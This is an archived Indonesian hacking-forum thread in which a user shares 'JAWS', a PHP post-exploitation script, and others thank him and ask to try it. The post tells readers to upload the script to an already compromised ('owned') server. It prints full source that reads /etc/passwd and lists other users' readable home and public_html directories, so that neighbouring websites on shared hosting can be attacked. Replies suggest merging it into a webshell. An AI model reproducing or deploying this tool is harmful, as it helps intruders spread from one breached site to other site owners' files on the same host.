+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: General Zone (https://www.indonesianbacktrack.or.id/forum/forum-172.html)
+--- Forum: Programming (https://www.indonesianbacktrack.or.id/forum/forum-95.html)
+---- Forum: PHP (https://www.indonesianbacktrack.or.id/forum/forum-112.html)
+---- Thread: JAWS. shell jumper :D (/thread-4631.html)
JAWS. shell jumper :D - alkaaf - 05-29-2013
haha. iseng juga nih buat aplikasi kecil kecilan. semoga berguna
.ane penasaran ama yang namanya shell jumping. ternyata itu sebuah teknik untuk menggerayah website orang lain melalui server yang sudah kita tembus. shell jumping akan menampilkan direktori hosting dari user lain yang "se-host" dengan korban kita. nah ane buat aplikasi kecil ini, bingung namainnya. karena obsesi ma hiu. jadi ane namain "JAWS - Jump to Another WebSite" =))=))
screenshot :
![[Image: jaws.png]](http://kecoa.jp22.net/image/jaws.png)
Cara pakai :
Cukup mudah, tinggal upload ke target yang telah "owned". dan buka JAWS-nya lewat browser. maka akan otomatis melakukan scanning home direktori user yang se-host dengan korban.
FYI : beberapa teknik jumping mungkin tidak bisa bekerja karena server yang digunakan adalah hosting karena server yang digunakan khusus untuk hosting sehingga tidak terdapat file "/etc/passwd". teknik jumping biasanya dilakukan diserver linux murni sehingga file "/etc/passwd" dapat terbaca.
Source code :
PHP Code:
<title>JAWS - Jump to Another WebSite</title>
<h1 style="color:#f00">JAWS - Jump to Another WebSite</h1>
<body style="font-family:verdana;color:#fff;background:#000;font-size:11px">
<?php
//shell jumper
$in = fopen("/etc/passwd","r");
if(!$in){
echo "Server does not support jumping";
}
else {
while(!feof($in)){
$data[] = fgets($in);
}
array_pop($data);
for($i = 0;$i < sizeof($data);$i++){
$buffer = explode(":",$data[$i]);
$str1 = "/home/".$buffer[0]."/public_html";
echo (is_readable($str1) ? "[FOUND] ".$str1."<br>\n":"");
$str2 = "/home/".$buffer[0]."/www";
echo (is_readable($str2) ? "[FOUND] ".$str2."<br>\n":"");
$str3 = "/home/".$buffer[0];
echo (is_readable($str3) ? "[FOUND] ".$str3."<br>\n":"");
$str4 = "/home/".$buffer[0]."/ftp";
echo (is_readable($str4) ? "[FOUND] ".$str4."<br>\n":"");
}
}
atau Download:
JAWS
RE: JAWS. shell jumper :D - faizul amali - 05-29-2013
Izin download om, lumayan buat nambah koleksi dan pengetahuan
RE: JAWS. shell jumper :D - alkaaf - 05-29-2013
silahkan om. kalo bisa kembangin juga
RE: JAWS. shell jumper :D - wine trochanter - 05-30-2013
nice share +1 dari ane
ijin coba dulu
RE: JAWS. shell jumper :D - alkaaf - 05-30-2013
(05-30-2013, 03:51 AM)wine trochanter Wrote: nice share +1 dari ane
ijin coba dulu
silahkan bro. kalo bisa bantu kembangin entah dimasukin webshelll atau kasi lokasi biasanya folder public_html berada. 
RE: JAWS. shell jumper :D - xsan-lahci - 05-30-2013
NOte : Boleh di kembangkan asal jangan bawa Indonesian Backtrack ya wkwkwk buat TS +1
RE: JAWS. shell jumper :D - alkaaf - 05-30-2013
(05-30-2013, 06:14 PM)xsan-lahci Wrote: NOte : Boleh di kembangkan asal jangan bawa Indonesian Backtrack ya wkwkwk buat TS +1
Hehe okelah. Ntar dikasi di credit nya
RE: JAWS. shell jumper :D - yhojoon - 06-01-2013
expert PHP
terus share om
RE: JAWS. shell jumper :D - yudha24 - 08-29-2015
nice omm, walaupun kadang udah jadi satu ama shell backdoor, tapi terus berkarya om